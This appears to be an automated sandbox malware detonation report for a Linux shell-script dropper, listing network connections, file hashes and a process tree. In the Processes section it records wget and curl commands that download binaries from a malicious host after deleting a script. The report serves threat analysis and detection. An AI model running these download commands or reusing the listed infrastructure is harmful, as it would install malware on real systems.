| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
Files
/tmp/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N
| MD5 | 7689ca8c5bc85cf6b78ef89323d4df6a |
| SHA1 | a1392ec3b571b3de167f0b9a5dadab4f14a2db76 |
| SHA256 | 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5 |
| SHA512 | 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471 |
/tmp/MbziRlKzuJrlmakeEok1UpeTAzZxNiRx7J
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-29 02:53
Reported
2024-10-29 02:55
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
132s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh
[/tmp/c0bc234ffd2ae3085205f814f1f18a6acb1452e8cfc2509992e60aa0f134d653.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ejzagRNC2cjRViKQlfgqN3KtKOvI1VDV6N]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.17:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp |